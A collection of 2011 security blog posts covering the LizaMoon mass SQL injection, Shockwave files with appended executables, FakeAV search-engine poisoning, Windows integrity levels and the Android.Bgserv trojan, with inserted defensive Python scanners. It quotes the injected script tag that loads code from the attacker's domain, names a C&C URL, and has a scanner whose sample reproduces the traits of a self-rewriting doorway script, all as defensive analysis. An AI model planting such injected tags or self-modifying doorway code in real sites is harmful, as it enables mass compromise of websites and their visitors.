March 2011 - Posts

Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.

The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:

<script src=hxxp://lizamoon.com/ur.php></script>

According to a Google Search, over 28,000 URLs (updated: 226,000) have been compromised. This includes several iTunes URLs, as you can see below:

And here is the injected code at one of those iTunes URLs:

The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple.

The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site: hxxp://defender-uqko.in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet.

The domain lizamoon.com was registered three days ago with clearly fake information:

We'll keep monitoring this mass-injection attack and provide updated information as it's available.

UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.

UPDATE2: We have been monitoring the attack since it came out and noticed that the number of compromised URLs is still increasing: 380,000 URLs so far. Moreover, domains other than lizamoon.com have started to be involved.
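The injected line quoted above is the campaign's fingerprint, and the iTunes observation shows why HTML-encoding neutralises it: once the tag is encoded it is text, not markup. The following Python script is an added example, not Websense's code. It collects every script src in page or feed markup and flags hosts outside an allow list; the trusted host, the sample page and the sample feed item are constructed for this example, while the injected tag itself is the one the post quotes (kept in its defanged hxxp form, which the parser treats like any other scheme).

```python
"""Find externally sourced <script> tags in page or feed content (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def external_script_hosts(markup, trusted_hosts):
    """Return (host, src) for every script loaded from a host outside trusted_hosts.

    Relative paths (no host) are treated as same-origin and ignored; a
    protocol-relative '//host/x' still yields a host and is checked.
    """
    parser = ScriptSrcCollector()
    parser.feed(markup)
    parser.close()
    findings = []
    for src in parser.srcs:
        host = urlparse(src).netloc.lower()
        if host and host not in trusted_hosts:
            findings.append((host, src))
    return findings


# Constructed sample: a page whose footer received the injected tag from the post.
# (The 'hxxp' defanging mirrors the post; on a live page the scheme is http.)
INJECTED_PAGE = """<html><head>
<script src="/static/site.js"></script>
<script src="https://www.example.com/app.js"></script>
</head><body><p>Episode list</p>
<script src=hxxp://lizamoon.com/ur.php></script>
</body></html>"""

# Constructed sample of the same payload as it looks once a feed consumer has
# HTML-encoded it (the iTunes behaviour the post describes): it is text, not a tag.
ESCAPED_FEED_ITEM = ("<item><description>Episode list "
                     "&lt;script src=hxxp://lizamoon.com/ur.php&gt;&lt;/script&gt;"
                     "</description></item>")

TRUSTED = {"www.example.com"}   # constructed allow list for the sample site


def scan_report(markup, trusted_hosts=TRUSTED):
    """One-line verdict used by the stand-alone run below."""
    hits = external_script_hosts(markup, trusted_hosts)
    if not hits:
        return "clean: no untrusted external scripts"
    return "INJECTED: " + ", ".join("%s (%s)" % (h, s) for h, s in hits)


if __name__ == "__main__":
    print(scan_report(INJECTED_PAGE))       # flags lizamoon.com
    print(scan_report(ESCAPED_FEED_ITEM))   # clean: encoding neutralised the tag
```

Run it over a crawl of your own pages or over the raw feed bodies a podcast client pulls; any host that is not yours or a known CDN is worth a look, and the encoded case shows what a well-behaved feed consumer hands you.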

 

Websense warns about Lizamoon
Published: 2011-03-31,
Last Updated: 2011-03-31 17:54:17 UTC
by Joel Esler (Version: 1)

This article over on the Websense blog is warning about a new mass SQL injection attack that they have dubbed "Lizamoon" (as that's the domain that the SQL injection attack is referring people to).

By searching for the string in Google, an estimated 226,000 sites have been attacked and defaced with this method. (We know that the numbers from Google aren't accurate, we are putting them there to display the size of the attack -- BIG.)

While I don't necessarily agree with the title of the article (implying that iTunes is infected), this attack and the MySQL attack from earlier this week are just more examples of how there isn't enough emphasis put on preventing SQL injection.



-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

Samsung laptops may have spyware pre-installed just for you!
Published: 2011-03-31,
Last Updated: 2011-03-31 15:19:23 UTC
by Joel Esler (Version: 2)

Update: Or not. :( Yes, we have also seen the stories from F-Secure and GFI Sunbelt. This was apparently a false positive that wasn't thoroughly investigated before it hit the wires. In this case, simply because the directory existed, the "aggressive" signature was triggered. All of the standard security software that we use (A/V, IDS, etc.) is subject to false positives, but I guess the real question this poses for us as a community is how good a job we are doing in following up and confirming what our software is telling us.

---------------------------------------------------------------------------------------------------------------

Looking at this article that I received from a reader this morning (thanks Bill!) over on MSNBC (a news agency which is a joint venture between Microsoft and NBC), a security researcher claims that Samsung is installing the keylogging software "StarLogger" on new Samsung laptops.

Samsung, according to the article, initially blamed Microsoft, only to back that out and claim it's installed to "monitor the performance of the machine and to find out how it is being used."

Naturally, if this is true, it's not a good thing.

So let's put a call out to our readers. Apparently this software puts itself in "C:\Windows\SL". So if you have a Samsung laptop, let us know at the contact link if that directory exists. If it does, this is wrong, and we need to emphasize that this type of thing isn't acceptable to these manufacturers.

Remind anyone of the Sony "rootkit" from a couple years ago?

As I have suspected for a while now, I was just informed that I will not be renewed as an MVP for Configuration Manager on April 1st.

It has been great working with all of the MVPs and Microsoft off and on over the years. Who knows, maybe I will be back someday.

In the meantime, things around here go on as usual, the struggle to keep things up and running continues.

Published: 2011-03-27,
Last Updated: 2011-03-27 20:20:24 UTC
by Guy Bruneau (Version: 1)

In the past month or so, I have observed some strange Shockwave files that, surprisingly, contain two other files appended to the end of the file. First, an EICAR test file is found at the end of the Shockwave file portion, which is immediately followed by a Windows executable. Most IDS would trigger on that Windows binary transfer, including Snort. The Shockwave file portion did not contain any malware.

The EICAR test file found, X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*, is the standard antivirus test file. [1]

However, after carving the Windows binary and submitting its MD5 for analysis to VirusTotal, it returned some surprising results. The MD5 of this file is 22a0c9e8f8c83f70caf04d757732eb21, and the results show that if this file manages to run, it could compromise the client.
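As an added example of the carving step described above (not the diary's own tooling), the Python below splits a Shockwave file from whatever follows it. For an uncompressed FWS file the header's length field marks the end of the SWF; for a zlib-compressed CWS file that field is the uncompressed size, so the SWF ends wherever the zlib stream ends, which zlib reports as unused data. The trailer is then checked for the EICAR string and for a DOS header whose e_lfanew points at a PE signature, and the carved binary is hashed the way the diary submitted it. The SWF stubs and the inert MZ/PE stub are constructed here; the MD5 quoted in the diary belongs to the real sample, not to these stubs.

```python
"""Separate a Shockwave (SWF) file from data appended after it (added example)."""
import hashlib
import struct
import zlib

# The standard EICAR test string, split in two so the source file is not itself flagged.
EICAR = (b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$"
         b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*")


def split_swf(data):
    """Return (swf_bytes, trailer_bytes).

    FWS (uncompressed): the 32-bit little-endian length in the header is the
    whole file length, so anything beyond it is a trailer.  CWS (zlib): that
    length is the *uncompressed* size, so the SWF ends where the zlib stream
    ends; decompressobj exposes the leftover as unused_data.  ZWS (LZMA) is
    not handled here.
    """
    if len(data) < 8 or data[:3] not in (b"FWS", b"CWS"):
        raise ValueError("not an FWS/CWS Shockwave file")
    declared_len = struct.unpack_from("<I", data, 4)[0]
    if data[:3] == b"FWS":
        return data[:declared_len], data[declared_len:]
    inflater = zlib.decompressobj()
    inflater.decompress(data[8:])
    inflater.flush()
    trailer = inflater.unused_data
    return data[:len(data) - len(trailer)], trailer


def looks_like_pe(blob):
    """True if blob starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def md5_hex(blob):
    return hashlib.md5(blob).hexdigest()


def analyze_swf(data):
    """Report what, if anything, is appended after the SWF: EICAR and/or a PE image."""
    swf, trailer = split_swf(data)
    report = {"swf_len": len(swf), "trailer_len": len(trailer),
              "eicar_at": None, "pe_at": None, "pe_md5": None}
    pos = trailer.find(EICAR)
    if pos != -1:
        report["eicar_at"] = pos
    pos = trailer.find(b"MZ")
    while pos != -1:                       # skip stray 'MZ' bytes that are not a header
        if looks_like_pe(trailer[pos:]):
            report["pe_at"] = pos
            report["pe_md5"] = md5_hex(trailer[pos:])   # hash of the carved binary
            break
        pos = trailer.find(b"MZ", pos + 1)
    return report


# ---- constructed samples (not the files from the diary) ----
_body = b"\x00" * 20                                  # stand-in for SWF tag data
SAMPLE_FWS = b"FWS" + bytes([10]) + struct.pack("<I", 8 + len(_body)) + _body
SAMPLE_CWS = b"CWS" + bytes([10]) + struct.pack("<I", 8 + len(_body)) + zlib.compress(_body)

_pe = bytearray(b"MZ" + b"\x00" * 0x3E)              # 64-byte DOS header
struct.pack_into("<I", _pe, 0x3C, 0x40)              # e_lfanew -> offset 0x40
FAKE_PE = bytes(_pe) + b"PE\x00\x00" + b"\x00" * 20  # inert stub, not a runnable executable

SUSPICIOUS_FWS = SAMPLE_FWS + EICAR + FAKE_PE
SUSPICIOUS_CWS = SAMPLE_CWS + EICAR + FAKE_PE

if __name__ == "__main__":
    for name, sample in (("FWS", SUSPICIOUS_FWS), ("CWS", SUSPICIOUS_CWS), ("clean", SAMPLE_CWS)):
        print(name, analyze_swf(sample))
```

A Snort rule that fires on the MZ header in an HTTP body sees only that something executable went by; this split tells you whether the Flash content was the carrier or the payload, which is the distinction the diary draws.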


Have you seen anything like this? Let us know via our contact form.

[1] http://www.eicar.org/anti_virus_test_file.htm

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

Published: 2011-03-15,
Last Updated: 2011-03-15 03:41:47 UTC
by Lenny Zeltser (Version: 1)

Windows Vista, 7 and Server 2008 include a feature called integrity levels, which is arguably the most under-appreciated security mechanism built into the operating system. Yet it provides powerful ways of mitigating the risks of computer attacks and malware infections. For instance, integrity levels can shield processes from keyloggers; they can also protect files from being accessed by malware running on an infected system.

Another potent benefit of integrity levels is the ability to limit the capabilities of an exploit that manages to compromise an application. This is what I'd like to discuss in the note below.

What Are Windows Integrity Levels?

Microsoft designed Windows integrity levels as a mechanism for enforcing mandatory access controls, which apply even when access would be granted according to the traditional discretionary controls that we're accustomed to. According to Microsoft:

"The integrity level is a representation of the trustworthiness of running application processes and objects, such as files created by the application. The integrity mechanism provides the ability for resource managers, such as the file system, to use pre-defined policies that block processes of lower integrity, or lower trustworthiness, from reading or modifying objects of higher integrity. The integrity mechanism allows the Windows security model to enforce new access control restrictions that cannot be defined by granting user or group permissions in access control lists (ACLs)."

This means that integrity levels can restrict one process from interacting with another process even if both processes are running under the same user account and even if the user has administrative privileges. 

Protecting Higher Integrity Objects from Malware

A process running under the Low integrity level will be prevented by the OS from modifying a process running under the Medium integrity level or from modifying a file assigned the Medium integrity level. (By default, Windows assigns the Medium label to objects.)

This is why it's advantageous to run the processes that are likely to be targeted by exploits under the Low integrity level. For instance, if a browser running under the Low integrity level gets exploited, the attacker's payload will have a hard time injecting itself into the majority of other processes or modifying critical files.

Didier Stevens illustrated the effectiveness of integrity levels for mitigating DLL injection risks by showing how the OS blocked the injection attempt from a Low integrity level process to a Medium one. He concluded that integrity levels may be a "good security feature to sandbox vulnerable, Internet facing applications."

Applications Designed to Run Under the Low Integrity Level

Though it may be possible to force an application to run under the Low integrity level if it wasn't designed for it, this will likely cause issues, such as the application not being able to load its configuration settings. Fortunately, some end-user applications are designed with Low integrity level in mind when they run on Windows Vista, 7 or Server 2008:

Internet Explorer's parent process runs under the Medium integrity level, while the process that represents each tab runs under the Low integrity level, thanks to the browser's Protected Mode feature:

Similarly, Google Chrome runs its tabs under the Low integrity level on Windows as part of its sandboxing capabilities:

Acrobat Reader 9 and lower runs under the Medium integrity level, like most processes in Windows:

Fortunately, most of the code of Acrobat Reader X runs under the Low integrity level. This is one of the security features built into this version of Acrobat to limit the capabilities of exploits delivered to the application's users through malicious PDF files:

Running a process under the Low integrity level helps minimize the damage it can do when exploited by malicious code. Hopefully, more programs will be built to take advantage of this feature of Microsoft Windows (ahem.. Firefox?).

-- Lenny Zeltser

Lenny Zeltser leads a security consulting team and teaches how to analyze and combat malware. He is active on Twitter and writes a daily security blog.

Published: 2011-03-15,
Last Updated: 2011-03-15 14:01:33 UTC
by Lenny Zeltser (Version: 1)

Performance and security enhancements of Internet Explorer 9 make the browser upgrade worth one's consideration. If you need to roll back the installation of IE 9 for whatever reason, you shouldn't have any issues. I tested the IE 9 uninstall process to revert a Windows 7 system to the state it was in when it had Internet Explorer 8 installed.

You can uninstall Internet Explorer 9 by using the "Uninstall a program" applet in Control Panel. Then, select "View installed updates".

Then, select "Windows Internet Explorer 9" from the list and click "Uninstall." After the removal process, Windows will probably prompt you to reboot.

After the reboot, you should have Internet Explorer 8 back in its full glory.

-- Lenny Zeltser

Lenny Zeltser leads a security consulting team and teaches how to analyze and combat malware. He is active on Twitter and writes a daily security blog.

Google Working with Microsoft to Curb MHTML Exploit - Security - News & Reviews - eWeek.com

Google noticed an increase in attacks on Microsoft Windows and Internet Explorer machines and is working with its rival to mitigate the MHTML exploit, which targets political activists.

Google said it is working with Microsoft to patch a hole in the Windows operating system hackers are trying to exploit to target activists, among other users.

The search engine, which called the attacks "highly targeted and apparently politically motivated," said the perpetrator(s) abuses a known vulnerability Microsoft treated with a temporary patch in late January.

The bug lies in the MHTML (MIME Encapsulation of Aggregate HTML) protocol handler on Windows XP and later Windows versions, and is exploited as a cross-site scripting attack when users surf the Web with Microsoft's Internet Explorer browser.

An attacker could leverage the hole by writing an HTML link designed to trigger a malicious script and convince the targeted user to click it.

The exploit can be used to run JavaScript code on IE, giving an attacker a way to access user information stored in the browser and trick users into installing malicious code.

Microsoft issued this fix for the security flaw in January, but the flaw is being used to target political activists and even users on at least one popular social Website, Google said.

Google's security engineers recommend that users, including businesses whose computers use IE, run Microsoft's Fixit solution on their computers to block this attack until a permanent patch is available.

For its part, Google said it has set up several server-side defenses to protect users of its own Web services against the MHTML exploit.

"That said, these are not tenable long-term solutions, and we can't guarantee them to be 100 percent reliable or comprehensive," Google's security team wrote in a blog post March 11. "We're working with Microsoft to develop a comprehensive solution for this issue."

That Google is working directly with rival Microsoft is a testament to the seriousness of the issue. Rivalries tend to get placed on the backburner where computer security is concerned, but the joint effort certainly underscores the companies' shared concern.

Indeed, Google said the abuse of this vulnerability represents a new quality in the exploitation of Web-level vulnerabilities. The company said such attacks previously focused on directly compromising users' systems, as opposed to leveraging vulnerabilities to interact with web services.


Published: 2011-03-15,
Last Updated: 2011-03-15 14:02:52 UTC
by Lenny Zeltser (Version: 3)

Microsoft released version 9 of its Internet Explorer web browser. You can download IE 9 from windows.microsoft.com.

Microsoft also set up a domain dedicated to the new browser: www.beautyoftheweb.com. Unfortunately, that site isn't hosted under the microsoft.com domain, nor does it have an SSL certificate to confirm that it belongs to Microsoft. Using this site to distribute the browser goes against the advice of downloading software only from known vendor websites. Copycat malicious sites claiming to distribute IE 9 will probably appear shortly, if they aren't around yet.

Internet Explorer 9 includes a number of security improvements that make the upgrade worth your consideration. These include application reputation capabilities that are part of the SmartScreen feature that helps protect the user against socially-engineered malware. The browser also supports the notion of Pinned Sites, which implements "secure launch" capabilities to safeguard users' sessions with important websites. Internet Explorer 9 also improves its resistance to exploits by embracing support for DEP/NX, ASLR and SafeSEH memory protection capabilities. The new browser also improves the messages its users see when they download files and programs; the messages are designed to make it easier for the users to assess the risk of opening such files.

Updates:

Have you had a chance to experiment with Internet Explorer 9? Let us know what you think of its security capabilities.

-- Lenny Zeltser

Lenny Zeltser leads a security consulting team and teaches how to analyze and combat malware. He is active on Twitter and writes a daily security blog.

Adobe Flash 0-day being used in targeted attacks
Published: 2011-03-14,
Last Updated: 2011-03-14 20:04:11 UTC
by Bojan Zdrnja (Version: 1)

Adobe posted a security advisory (http://www.adobe.com/support/security/advisories/apsa11-01.html) about a new 0-day vulnerability in Flash. According to the post about this vulnerability (available at http://blogs.adobe.com/asset/2011/03/background-on-apsa11-01-patch-schedule.html), Adobe says that they have had reports of this new vulnerability being used in targeted attacks. These attacks seem to be particularly sneaky: the Flash exploit is embedded in an Excel file, which is also used to set up memory so the exploit has a higher chance of succeeding.

We will keep an eye on this and on whether the 0-day starts being used in the wild. If you have more information that you can share about this, let us know.

Published: 2011-03-14,
Last Updated: 2011-03-14 08:21:18 UTC
by Bojan Zdrnja (Version: 1)

A lot of people are still surprised how quickly bad guys catch up with events in the real world - this is especially true for the RogueAV/FakeAV groups which constantly poison search engines in order to lure people into installing their malware.

We can also see many AV vendors warning people to be careful when they search for this or that (currently, obviously, the search query that generates the most attention is related to the disaster in Japan). While it is good to constantly raise awareness and warn people about what's happening, one important thing to know is that the RogueAV/FakeAV guys poison search engines and modify their scripts automatically. This means that they are constantly on top of current trends and events in the world: whatever happens, their scripts will make sure that they "contain" the latest data/information about it.

Back last year I wrote two diaries explaining how a certain RogueAV/FakeAV group works; if you haven’t seen them before I’d strongly recommend that you take a look, they are available at:

http://isc.sans.edu/diary.html?storyid=9085
http://isc.sans.edu/diary.html?storyid=9103

There are many RogueAV/FakeAV groups so the analysis posted above just concerns one of them (it’s interesting to see that they are still very much active).

With the disaster in Japan striking on Friday we saw another RogueAV/FakeAV group heavily poisoning the search engines – even Google which normally removes them quickly still contains hundreds of thousands of such pages. Since this campaign can be easily identified, here is what the current count says:

Google count

Yes, 1.7 million pages (!!!). Keep in mind that there are multiple pages listed here with different search terms (they modify search terms through a single parameter), but the number is still staggering. According to Google, in the past 24 hours there have been 14,200 such pages added, so it's clear that the bad guys are very active.

This RogueAV/FakeAV group uses different code than the one I previously analyzed. They actually drop pretty interesting, self modifying PHP code.
The code contains a list of current searches/trends. The list contains hundreds of such keywords, some of which are shown below:

$lastquery = "<keys>cee-lo-green-grammyswhat-chilli-wants-finale … japan-tsunami-newsokinawa-japan-tsunami-2011tsunami-and-earthquake-in-japan</keys>";

Notice how the list is delimited by <keys> tags. This allows the owner of the script to automatically update the keywords the script will react to: by using a special parameter to identify himself, the owner can submit a new keyword, and the script will modify itself by adding this keyword if it hasn't been found in the $lastquery list before:

Self modifying code

The same function is used if Google's or another search engine's bot visits the web page: the main script checks the user agent that was submitted and even has a list of networks that can help the script owner identify "visitors" he or she does not want to be redirected to the final site hosting RogueAV.

But this is not all. When visited by a search engine’s bot, the script (among the other things) tries to create a very legitimate looking web page that should help poison the search engine. In order to create this legitimate looking web page, the script automatically queries Google to see related searches for the current search query (the hottrends web page at Google). Besides Google it will also use Yahoo to search for new pages and, what’s probably the most interesting, will retrieve images from Google images that are related to the same query term!

Retrieving images from Google

This way the RogueAV/FakeAV guys can create very realistic pages that can, unfortunately as we’ve all witnessed, successfully poison search engines.
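A web-host owner cleaning up a compromised server can look for the three traits the diary describes: a keyword list wrapped in <keys> tags, a user-agent check for search-engine bots, and code that rewrites its own file. The Python below is an added example, not the group's script and not the diary's tooling. The PHP it scans is constructed to carry just those traits; the idea that self-modification is done by writing to __FILE__ is this example's own assumption, and the crawler names it matches on are a starting list, not the group's.

```python
"""Triage PHP files for the search-poisoning traits described in the diary (added example)."""
import os
import re
import sys

# Constructed stand-in for the dropped script: only the traits the diary describes
# are reproduced (keyword list, bot check, self-rewrite); it is not a working doorway.
SAMPLE_PHP = r'''<?php
$lastquery = "<keys>cee-lo-green-grammys
what-chilli-wants-finale
japan-tsunami-news
okinawa-japan-tsunami-2011
tsunami-and-earthquake-in-japan</keys>";
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
$is_bot = strpos($ua, 'googlebot') !== false;
if (isset($_GET['addkey']) && isset($_GET['owner'])) {
    // assumed self-update mechanism: rewrite this very file with the new keyword
    $src = file_get_contents(__FILE__);
    file_put_contents(__FILE__, str_replace("</keys>", $_GET['addkey'] . "\n</keys>", $src));
}
'''

CLEAN_PHP = "<?php\necho 'hello';\n"   # constructed benign file for comparison

KEYS_RE = re.compile(r"<keys>(.*?)</keys>", re.S)
# a user-agent lookup followed within a few hundred bytes by a crawler name
BOT_UA_RE = re.compile(r"HTTP_USER_AGENT[\s\S]{0,400}?(googlebot|bingbot|msnbot|slurp)", re.I)
# the script opening or overwriting its own source (assumed self-modification idiom)
SELF_WRITE_RE = re.compile(r"(file_put_contents|fopen)\s*\(\s*__FILE__")


def triage_php(source):
    """Return (findings, keywords); findings['score'] counts the traits present (0-3)."""
    match = KEYS_RE.search(source)
    keywords = match.group(1).split() if match else []
    findings = {
        "keyword_list": bool(keywords),
        "bot_user_agent_check": bool(BOT_UA_RE.search(source)),
        "self_modifying": bool(SELF_WRITE_RE.search(source)),
    }
    findings["score"] = sum(findings.values())
    return findings, keywords


def scan_tree(root, min_score=2):
    """Walk a document root; return {path: (findings, keywords)} for .php files at or above min_score."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    findings, keywords = triage_php(fh.read())
            except OSError:
                continue
            if findings["score"] >= min_score:
                hits[path] = (findings, keywords)
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:                       # python triage.py /var/www
        for path, (findings, keywords) in scan_tree(sys.argv[1]).items():
            print(path, findings, "keywords:", len(keywords))
    else:
        print("sample:", triage_php(SAMPLE_PHP))
        print("clean: ", triage_php(CLEAN_PHP))
```

The keyword list that comes back is worth keeping: it tells you which search terms the poisoned pages were built for, and a file that both checks for crawlers and rewrites itself has no legitimate reason to exist under a document root.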

(to be continued)


Published: 2011-03-11,
Last Updated: 2011-03-11 13:29:49 UTC
by Guy Bruneau (Version: 1)

There will probably be some emails scams and malware circulating regarding the recent Japanese earthquake that occurred overnight. If you receive such emails, could you provide samples using our contact form?

Be aware of:

Fraudulent Organizations: If possible, donate to organizations you know and trust, not to new organizations just set up for this particular event. The IRS maintains a list of tax exempt charitable organizations [1]. This list is not 100% up to date, and it takes a while for a new organization to be added. But it can serve as a first sanity check.

Malware: Malware may be advertised as a video report of the event or come under other pretenses.

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

Android.Bgserv Found on Fake Google Security Patch – Part II | Symantec Connect

Following our initial post on the discovery of Android.Bgserv, Symantec has found additional Trojanized samples in the wild. After analysis of these new samples, it appears that the applications contain multiple bugs. In the case of the Trojanized version of Google’s Security Tool, we have confirmed after testing (with no surprise) that it does not have the ability to clean a system infected with Android.Rootcager.

The Trojanized applications also contain code to change an infected device's APN settings. The screenshot below belongs to the threat code responsible for changing them. However, in our research we have not been able to identify the code being called at any time.

Our research also shows that even if this APN change code was called, the application's permissions would not allow the requested changes to take place. This can be seen in the screenshot below, showing the Trojanized application's manifest:

An application willing to change the APN settings is required to hold the “android.permission.WRITE_APN_SETTING” permission. We have also found some other pieces of interesting code within the threat that seem to be dormant. One example of this is seen in the screenshot below:

The purpose of this code seems to be to block incoming calls from specific telephone numbers. In this case, the telephone numbers in question seem to belong to a major Chinese telecom operator's customer care service.  

Below is an image showing the command-and-control (C&C) server that is being used by this threat and an example of the information that is posted to the C&C server. At the time of writing, the C&C server was live but not serving commands.

Our overall analysis of this threat has shown it to be a potentially worrying threat. However, the threat's perpetrators have failed to fully implement all of the functionality within the infected applications, thereby lessening its potential impact as a threat.

Here are a few tips that may help to identify whether or not a device has been infected with Android.Bgserv. The legitimate Android Security tool was automatically pushed to infected users and did not require manual download.  Also, it does not show up within the application menu, as opposed to the malicious one:

We can see the malicious service that has been started by the Trojanized tool running in the background as “BgService”:

Finally, to avoid becoming a victim of such malicious Android applications, we recommend that you only use regulated Android marketplaces for downloading and installing Android applications. Also, in the Android OS application settings there is an option to stop the installation of non-market applications, which can help to prevent against this type of attack. Checking user comments on the marketplace can also assist in determining if the application is safe. Lastly, always check the access permissions being requested during the installation of any Android applications. If they seem excessive for what the application is designed to do, it would be wise to stop installing the application.
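Symantec's observation that the dormant APN code could not have acted because the manifest never requests the permission, and the closing advice to read the requested permissions before installing, both come down to reading the manifest. The Python below is an added example, not Symantec's analysis code: it parses a manifest in decoded XML form (as produced by apktool), lists the declared permissions and services, checks whether a given capability is actually granted, and flags the sensitive ones. The manifest it reads is constructed for this example; the real permission constant for APN changes is android.permission.WRITE_APN_SETTINGS, and the reasons in the table are this example's own notes.

```python
"""List and review the permissions an Android manifest declares (added example)."""
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS

# Permissions that deserve a second look in an app claiming to be a security tool.
SENSITIVE = {
    "android.permission.SEND_SMS": "can send SMS on command (premium-rate or C&C replies)",
    "android.permission.RECEIVE_SMS": "can intercept incoming SMS",
    "android.permission.WRITE_APN_SETTINGS": "can change APN/proxy settings",
    "android.permission.PROCESS_OUTGOING_CALLS": "can observe and abort outgoing calls",
    "android.permission.RECEIVE_BOOT_COMPLETED": "can start a background service at boot",
    "android.permission.READ_PHONE_STATE": "reads device identifiers often posted to a C&C server",
}


def declared_permissions(manifest_xml):
    """Sorted permission names from every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return sorted(el.get(NAME_ATTR) for el in root.iter("uses-permission") if el.get(NAME_ATTR))


def holds_permission(manifest_xml, permission):
    """Would code that needs this permission actually be allowed to act?"""
    return permission in declared_permissions(manifest_xml)


def background_services(manifest_xml):
    """Names of declared <service> components (what shows up as a running service)."""
    root = ET.fromstring(manifest_xml)
    return [el.get(NAME_ATTR) for el in root.iter("service") if el.get(NAME_ATTR)]


def review(manifest_xml):
    """(permission, reason) for each declared permission listed in SENSITIVE."""
    return [(p, SENSITIVE[p]) for p in declared_permissions(manifest_xml) if p in SENSITIVE]


# Constructed manifest (decoded to text) of a repackaged "security tool" that also
# wants SMS and boot-time start but never requests the APN permission.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.securitytool">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:label="Security Tool">
        <service android:name=".BgService"/>
    </application>
</manifest>"""


if __name__ == "__main__":
    # Usage: python review_manifest.py AndroidManifest.xml  (decoded XML, e.g. from apktool)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            xml_text = fh.read()
    else:
        xml_text = SAMPLE_MANIFEST
    print("permissions:", declared_permissions(xml_text))
    print("services:   ", background_services(xml_text))
    for perm, reason in review(xml_text):
        print("  !", perm, "-", reason)
    print("can change APN:", holds_permission(xml_text, "android.permission.WRITE_APN_SETTINGS"))
```

A cleanup tool has no business sending SMS or starting at boot, so the review list is the part to read before tapping Install; the holds_permission check is the same reasoning Symantec applied to the dormant APN code.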

Note: Special thanks to Irfan Asrar for all his input into this blog.

Android.Bgserv Found on Fake Google Security Patch | Symantec Connect
On March 6, 2011, Google published the application "Android Market Security Tool", a tool designed to undo the side effects caused by Android.Rootcager. This application was automatically pushed to devices of users who had downloaded and installed infected applications.

Symantec has identified suspicious code within a repackaged version of the “Android Market Security Tool”. This package was found on an unregulated third-party Chinese marketplace. This threat seems to be able to send SMS messages if instructed by a command-and-control server located at the following address:

hxxp://www.youlubg.com:81/Coop/request3.php

Analysis of the application is still ongoing, however, what is shocking is that the threat’s code seems to be based on a project hosted on Google Code and licensed under the Apache License:

http://code.google.com/p/mmsbg/

Here are a few snippets taken from Google’s hosted project:

We have added detection for the trojanized version of Google’s application as Android.Bgserv.

iOS 4.3 released, numerous security vulnerabilities patched
Published: 2011-03-10,
Last Updated: 2011-03-10 08:32:30 UTC
by Bojan Zdrnja (Version: 1)

Apple released a new version of iOS for iPhone, iPad and iPod Touch devices. Besides some new features that are being introduced with this release of iOS, Apple also patched a number of security vulnerabilities.

You can see the whole list at http://support.apple.com/kb/HT4564 - some of these are really low risk, but if you scroll down to the WebKit fixes, you can see that Apple patched 49 (!!!) security vulnerabilities that, according to Apple, "may lead to an unexpected application termination or arbitrary code execution" (in other words: having your device pwned).

While we are not aware of any exploits for these vulnerabilities being abused, it's always better to be safe and update your i* devices as early as you can.

--
Bojan
INFIGO IS